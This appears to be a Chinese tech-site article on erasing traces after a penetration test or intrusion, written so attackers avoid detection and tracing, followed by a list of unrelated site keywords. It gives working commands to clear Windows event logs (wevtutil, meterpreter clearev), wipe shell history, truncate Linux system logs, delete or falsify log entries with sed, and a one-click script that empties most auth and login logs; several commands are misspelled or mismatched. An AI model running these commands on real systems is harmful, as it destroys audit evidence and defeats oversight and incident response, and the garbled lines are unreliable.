后渗透阶段清理痕迹的方法步骤
发表于:2024-11-27 作者:千家信息网编辑
千家信息网最后更新 2024年11月27日,这篇文章主要介绍"后渗透阶段清理痕迹的方法步骤",在日常操作中,相信很多人在后渗透阶段清理痕迹的方法步骤问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答"后渗透阶段清理痕迹
千家信息网最后更新 2024年11月27日后渗透阶段清理痕迹的方法步骤
这篇文章主要介绍"后渗透阶段清理痕迹的方法步骤",在日常操作中,相信很多人在后渗透阶段清理痕迹的方法步骤问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答"后渗透阶段清理痕迹的方法步骤"的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
一、前言
在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹的方式做一个总结。
二、windows
有远程桌面权限时手动删除日志:
开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志
wevtutil:
wevtutil el 列出系统中所有日志名称wevtutil cl system 清理系统日志wevtutil cl application 清理应用程序日志wevtutil cl security 清理安全日志
meterperter自带清除日志功能:
clearev 清除windows中的应用程序日志、系统日志、安全日志
清除recent:
在文件资源管理器中点击"查看"->"选项"->在常规->隐私中点击"清除"按钮或直接打开C:\Users\Administrator\Recent并删除所有内容或在命令行中输入del /f /s /q "%userprofile%\Recent*.*
三、linux
清除命令历史记录
histroy -r #删除当前会话历史记录history -c #删除内存中的所有命令历史rm .bash_history #删除历史文件中的内容HISTZISE=0 #通过设置历史命令条数来清除所有历史记录在隐蔽的位置执行命令使用vim打开文件执行命令:set history=0:!command
linux日志文件
/var/run/utmp 记录现在登入的用户/var/log/wtmp 记录用户所有的登入和登出/var/log/lastlog 记录每一个用户最后登入时间/var/log/btmp 记录错误的登入尝试/var/log/auth.log 需要身份确认的操作/var/log/secure 记录安全相关的日志信息/var/log/maillog 记录邮件相关的日志信息/var/log/message 记录系统启动后的信息和错误日志/var/log/cron 记录定时任务相关的日志信息/var/log/spooler 记录UUCP和news设备相关的日志信息/var/log/boot.log 记录守护进程启动和停止相关的日志消息
完全删除日志文件:
cat /dev/null > filename: > filename> filenameecho "" > filenameecho > filename
针对性删除日志文件:
删除当天日志sed -i '/当天日期/'d filename
篡改日志文件:
将所有172.16.13.1 ,ip替换为127.0.0.1sed -i 's/170.170.64.17/127.0.0.1/g'
一键清除脚本:
#!/usr/bin/bashecho > /var/log/syslogecho > /var/log/messagesecho > /var/log/httpd/access_logecho > /var/log/httpd/error_logecho > /var/log/xferlogecho > /var/log/secureecho > /var/log/auth.logecho > /var/log/user.logecho > /var/log/wtmpecho > /var/log/lastlogecho > /var/log/btmpecho > /var/run/utmprm ~/./bash_historyhistory -c
到此,关于"后渗透阶段清理痕迹的方法步骤"的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注网站,小编会继续努力为大家带来更多实用的文章!
日志
文件
痕迹
历史
命令
方法
信息
系统
步骤
阶段
学习
安全
用户
程序
管理
内容
工具
应用程序
更多
错误
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
如何在本地搭建服务器
基于瑞萨单片机的软件开发
2022哇嘎连不上服务器
数据库和myeclise
山东省济南市正规浪潮服务器
网络安全知识有奖
长沙新友软件开发公司
大学生软件开发招聘信息
网络安全产品及功能
本地压测和服务器压测
数据库的访问
物流竞价软件开发服务
江西华宇软件开发有限公司
软件开发技术年终奖名字
浙江软件开发公司注册
泾县智能软件开发服务维修价格
杭州软件开发团队
软件开发专业课无聊么
在线学习网络技术
济南纷邦网络技术公司
尚德机构软件开发工程师招聘
chns数据库处理
我市开展网络安全宣传活动
网络安全pop字体
服务器跑python脚本
联通网络服务器怎么连接电视
siri服务器
如何将网页内容和数据库连接起来
河南省高校网络安全宣传周
网络安全与管理 教材